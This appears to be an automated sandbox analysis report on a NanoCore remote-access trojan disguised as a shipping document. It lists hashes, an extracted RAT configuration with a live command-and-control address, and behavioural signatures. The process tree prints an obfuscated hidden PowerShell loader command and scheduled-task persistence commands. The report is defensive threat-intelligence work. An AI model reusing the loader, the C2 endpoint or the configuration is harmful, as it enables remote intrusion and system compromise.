Analysis
-
max time kernel
149s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
02-09-2024 15:51
Static task
static1
Behavioral task
behavioral1
Sample
8921FD_0279710820_2024092_017820935610_GDT0167836390-MALAYSIA.exe
Resource
win7-20240704-en
General
-
Target
8921FD_0279710820_2024092_017820935610_GDT0167836390-MALAYSIA.exe
-
Size
575KB
-
MD5
57b1a55d388f0beeed00b19b8370c05b
-
SHA1
c0055a01f0b7dc7a78178b64d37ef6fd67dcb314
-
SHA256
2d3b04606612dc4008fd108cf2a825a8c1e58e8ab5578abbbac77ea39ed4f73e
-
SHA512
19fc0e1b9cc4a9bdce1670be9d7516e5f64bab145cf87467136724ef18817636e66ede0016623959d21535c2819649871e1d287b9bd4b34a7525c98aac4009ee
-
SSDEEP
12288:Tv3EFV27dnw8BrOkOXyekQNyyXYpKvgZ4eu+72Tt36eX0dlPZ:DU2dn/B3O8QssqKvgqeu+4tnuX
Malware Config
Extracted
nanocore
1.2.2.0
134.19.179.203:31279
e3a8bae3-78c2-40a6-9bf2-4d7fbecfd001
-
activate_away_mode
true
- backup_connection_host
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2024-06-11T02:19:05.486470936Z
-
bypass_user_account_control
false
-
bypass_user_account_control_data
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+DQo8VGFzayB2ZXJzaW9uPSIxLjIiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvMjAwNC8wMi9taXQvdGFzayI+DQogIDxSZWdpc3RyYXRpb25JbmZvIC8+DQogIDxUcmlnZ2VycyAvPg0KICA8UHJpbmNpcGFscz4NCiAgICA8UHJpbmNpcGFsIGlkPSJBdXRob3IiPg0KICAgICAgPExvZ29uVHlwZT5JbnRlcmFjdGl2ZVRva2VuPC9Mb2dvblR5cGU+DQogICAgICA8UnVuTGV2ZWw+SGlnaGVzdEF2YWlsYWJsZTwvUnVuTGV2ZWw+DQogICAgPC9QcmluY2lwYWw+DQogIDwvUHJpbmNpcGFscz4NCiAgPFNldHRpbmdzPg0KICAgIDxNdWx0aXBsZUluc3RhbmNlc1BvbGljeT5QYXJhbGxlbDwvTXVsdGlwbGVJbnN0YW5jZXNQb2xpY3k+DQogICAgPERpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzPmZhbHNlPC9EaXNhbGxvd1N0YXJ0SWZPbkJhdHRlcmllcz4NCiAgICA8U3RvcElmR29pbmdPbkJhdHRlcmllcz5mYWxzZTwvU3RvcElmR29pbmdPbkJhdHRlcmllcz4NCiAgICA8QWxsb3dIYXJkVGVybWluYXRlPnRydWU8L0FsbG93SGFyZFRlcm1pbmF0ZT4NCiAgICA8U3RhcnRXaGVuQXZhaWxhYmxlPmZhbHNlPC9TdGFydFdoZW5BdmFpbGFibGU+DQogICAgPFJ1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+ZmFsc2U8L1J1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+DQogICAgPElkbGVTZXR0aW5ncz4NCiAgICAgIDxTdG9wT25JZGxlRW5kPmZhbHNlPC9TdG9wT25JZGxlRW5kPg0KICAgICAgPFJlc3RhcnRPbklkbGU+ZmFsc2U8L1Jlc3RhcnRPbklkbGU+DQogICAgPC9JZGxlU2V0dGluZ3M+DQogICAgPEFsbG93U3RhcnRPbkRlbWFuZD50cnVlPC9BbGxvd1N0YXJ0T25EZW1hbmQ+DQogICAgPEVuYWJsZWQ+dHJ1ZTwvRW5hYmxlZD4NCiAgICA8SGlkZGVuPmZhbHNlPC9IaWRkZW4+DQogICAgPFJ1bk9ubHlJZklkbGU+ZmFsc2U8L1J1bk9ubHlJZklkbGU+DQogICAgPFdha2VUb1J1bj5mYWxzZTwvV2FrZVRvUnVuPg0KICAgIDxFeGVjdXRpb25UaW1lTGltaXQ+UFQwUzwvRXhlY3V0aW9uVGltZUxpbWl0Pg0KICAgIDxQcmlvcml0eT40PC9Qcmlvcml0eT4NCiAgPC9TZXR0aW5ncz4NCiAgPEFjdGlvbnMgQ29udGV4dD0iQXV0aG9yIj4NCiAgICA8RXhlYz4NCiAgICAgIDxDb21tYW5kPiIjRVhFQ1VUQUJMRVBBVEgiPC9Db21tYW5kPg0KICAgICAgPEFyZ3VtZW50cz4kKEFyZzApPC9Bcmd1bWVudHM+DQogICAgPC9FeGVjPg0KICA8L0FjdGlvbnM+DQo8L1Rhc2s+
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
31279
-
default_group
Default
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
e3a8bae3-78c2-40a6-9bf2-4d7fbecfd001
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
134.19.179.203
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
false
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3644 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation 8921FD_0279710820_2024092_017820935610_GDT0167836390-MALAYSIA.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WPA Monitor = "C:\\Program Files (x86)\\WPA Monitor\\wpamon.exe" wab.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 21 drive.google.com 22 drive.google.com -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\postscuttella\felix.lnk 8921FD_0279710820_2024092_017820935610_GDT0167836390-MALAYSIA.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1128 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3644 powershell.exe 1128 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3644 set thread context of 1128 3644 powershell.exe 103 -
Drops file in Program Files directory 3 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Common Files\bekldningsgenstands\Handelskurs247.fri 8921FD_0279710820_2024092_017820935610_GDT0167836390-MALAYSIA.exe File created C:\Program Files (x86)\WPA Monitor\wpamon.exe wab.exe File opened for modification C:\Program Files (x86)\WPA Monitor\wpamon.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8921FD_0279710820_2024092_017820935610_GDT0167836390-MALAYSIA.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 404 schtasks.exe 3712 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 3644 powershell.exe 3644 powershell.exe 3644 powershell.exe 3644 powershell.exe 3644 powershell.exe 3644 powershell.exe 3644 powershell.exe 3644 powershell.exe 3644 powershell.exe 3644 powershell.exe 1128 wab.exe 1128 wab.exe 1128 wab.exe 1128 wab.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1128 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3644 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3644 powershell.exe Token: SeDebugPrivilege 1128 wab.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 4692 wrote to memory of 3644 4692 8921FD_0279710820_2024092_017820935610_GDT0167836390-MALAYSIA.exe 93 PID 4692 wrote to memory of 3644 4692 8921FD_0279710820_2024092_017820935610_GDT0167836390-MALAYSIA.exe 93 PID 4692 wrote to memory of 3644 4692 8921FD_0279710820_2024092_017820935610_GDT0167836390-MALAYSIA.exe 93 PID 3644 wrote to memory of 1128 3644 powershell.exe 103 PID 3644 wrote to memory of 1128 3644 powershell.exe 103 PID 3644 wrote to memory of 1128 3644 powershell.exe 103 PID 3644 wrote to memory of 1128 3644 powershell.exe 103 PID 3644 wrote to memory of 1128 3644 powershell.exe 103 PID 1128 wrote to memory of 3712 1128 wab.exe 104 PID 1128 wrote to memory of 3712 1128 wab.exe 104 PID 1128 wrote to memory of 3712 1128 wab.exe 104 PID 1128 wrote to memory of 404 1128 wab.exe 106 PID 1128 wrote to memory of 404 1128 wab.exe 106 PID 1128 wrote to memory of 404 1128 wab.exe 106
Processes
-
C:\Users\Admin\AppData\Local\Temp\8921FD_0279710820_2024092_017820935610_GDT0167836390-MALAYSIA.exe"C:\Users\Admin\AppData\Local\Temp\8921FD_0279710820_2024092_017820935610_GDT0167836390-MALAYSIA.exe"1⤵
- Checks computer location settings
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4692 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden ; $Kviksoelv=Get-Content 'C:\Users\Admin\AppData\Local\Unspliced\fordelen\ecuadoriansk\Srgerand\Aandeligs.spi';$Spangled=$Kviksoelv.SubString(19245,3);.$Spangled($Kviksoelv)2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3644 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1128 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "WPA Monitor" /xml "C:\Users\Admin\AppData\Local\Temp\tmp7BE2.tmp"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3712
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "WPA Monitor Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp7DB8.tmp"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:404
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4396,i,1330210614411927383,9239043499051775691,262144 --variations-seed-version --mojo-platform-channel-handle=1320 /prefetch:81⤵PID:4028
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD55ccc18c3f1852b87de26278cba055c13
SHA19233db8c004ac3e1b34c0782bac706a17bdc43ae
SHA2567d588a9e361cccb0a3c97ec7ac99efe60e82932c64ab6efbfc929f51acb38432
SHA5121ad0e9d090e93bdfa76c7ff60c5492c43265f53adf0ac23a7c831231e12822b11bae6d0840f92c8deddc9e08dbb383d24073ece791feaf36687692a437294ed7
-
Filesize
1KB
MD5a246b3561d823177f3586e629f144233
SHA10f05d12e55a1d2e5e6a4f307c193882fba093315
SHA2566abae7707b06e52b58f537b335e367cc54b093e899d78f16e94ceaf7ceafca52
SHA5124246aa9a96331e2c7e36b37fa778e31ecae055c77164e0dc673aa50cdec368f08d356ab06ef1a4540816c474828048ab1bebed7e211a4eb929f2918e1fac9c6d
-
Filesize
53KB
MD5a37c3952ee3893cbf89f852bfd3002b7
SHA1d788b7529db250df7e9e8ad7f3fa8f3bc4ad9035
SHA256f51cb72204c964faeb4992fcadacc7a127fa3fec435700b2c09aa46fa47ffaf7
SHA5127b94695d8788f692cb996becd245795d04d4cdfce4708c0d28095f82f004fe11397121eddabdca9813bca9fd7d27f596983bf83d059effc6ce128c8a49694e7e
-
Filesize
405KB
MD5d4717b9c25cc359ed707f3b965462a0a
SHA10e9947033f4ea69af4078c40fec3866b5ddd1be7
SHA256d85a65228850c98722cfaa887722406605a188246801819b64b327520693abf3
SHA5123dd4f606299763623e4ff78acd04b9b23eee93ccccf0a9b0fec34deb8e1841c16891d7d09b982def786c09e4f7b5e4eb7bd78febe45260c940053294f74beec6